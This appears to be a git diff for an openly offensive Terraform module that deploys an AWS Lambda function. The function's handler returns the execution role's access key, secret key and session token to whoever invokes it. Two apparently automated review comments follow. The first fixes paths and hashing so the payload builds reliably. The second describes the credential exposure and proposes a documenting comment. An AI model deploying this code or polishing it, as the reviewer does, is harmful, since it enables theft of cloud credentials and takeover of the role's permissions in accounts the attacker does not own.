diff --git a/main.tf b/main.tf
index 0fba0a2..dffc4e6 100644
--- a/main.tf
+++ b/main.tf
@@ -1,10 +1,16 @@
+data "archive_file" "payload" {
+ type = "zip"
+ source_dir = "src"
+ output_path = "${path.module}/.terraform/modules/lambda-function-credential-exfiltration/payload.zip"
+}
+
 resource "aws_lambda_function" "this" {
- filename = ".terraform/modules/lambda-function-credential-exfiltration/payload.zip"
+ filename = data.archive_file.payload.output_path
 function_name = "test"
 role = var.role_arn
 handler = "index.handler"
- source_code_hash = filebase64sha256(".terraform/modules/lambda-function-credential-exfiltration/payload.zip")
+ source_code_hash = filebase64sha256(data.archive_file.payload.output_path)
 runtime = "nodejs12.x"
 }
diff --git a/payload.zip b/payload.zip
deleted file mode 100644
index a0b8b58..0000000
Binary files a/payload.zip and /dev/null differ
diff --git a/src/index.js b/src/index.js
new file mode 100644
index 0000000..9add90f
--- /dev/null
+++ b/src/index.js
@@ -0,0 +1,12 @@
+exports.handler = async (event) => {
+
+ const response = {
+ statusCode: 200,
+ body: {
+ "AWS_ACCESS_KEY_ID": process.env.AWS_ACCESS_KEY_ID,
+ "AWS_SECRET_ACCESS_KEY": process.env.AWS_SECRET_ACCESS_KEY,
+ "AWS_SESSION_TOKEN": process.env.AWS_SESSION_TOKEN
+ },
+ };
+ return response;
+};
diff --git a/src/package-lock.json b/src/package-lock.json
new file mode 100644
index 0000000..4b0e193
--- /dev/null
+++ b/src/package-lock.json
@@ -0,0 +1,5 @@
+{
+ "name": "payload",
+ "version": "1.0.0",
+ "lockfileVersion": 1
+}
diff --git a/src/package.json b/src/package.json
new file mode 100644
index 0000000..8ef8a97
--- /dev/null
+++ b/src/package.json
@@ -0,0 +1,12 @@
+{
+ "name": "payload",
+ "version": "1.0.0",
+ "description": "Offensive Terraform Lambda Credential Exfiltration",
+ "main": "index.js",
+ "scripts": {
+ "test": "echo \"Error: no test specified\" && exit 1"
+ },
+ "author": "Itgel Ganbold",
+ "license": "ISC",
+ "dependencies": {}
+}
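Review bot: In the main.tf hunk, `source_dir = "src"` is resolved against the directory Terraform is run from rather than the module, while `output_path` starts at `path.module` and then repeats the `.terraform/modules/lambda-function-credential-exfiltration/` prefix, so the archive probably builds only when the module is installed under that exact name and the root happens to contain a `src` directory. Anchoring both on the module, `source_dir = "${path.module}/src"` and `output_path = "${path.module}/payload.zip"`, removes that dependency on the caller's layout. For the hash, `source_code_hash = data.archive_file.payload.output_base64sha256` uses the data source's own attribute and avoids `filebase64sha256()` reading a zip that may not exist yet when the expression is evaluated.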
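Review bot: The new handler in src/index.js puts the execution role's `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` and `AWS_SESSION_TOKEN` into the invocation result, and nothing in the file documents that; every principal allowed to invoke the function, and every place the result is stored or logged, then holds a usable session for `var.role_arn`. A header comment should say so, for example `// Returns the execution role's temporary credentials; the invocation result is secret material and the role's policy bounds what a caller obtains.` For whoever operates the account, the effective controls are the permissions attached to that role and who holds invoke permission on the function, and use of the session outside the function should be visible in CloudTrail under the role's assumed-role identity. The `event` parameter is unused and could be dropped from the signature.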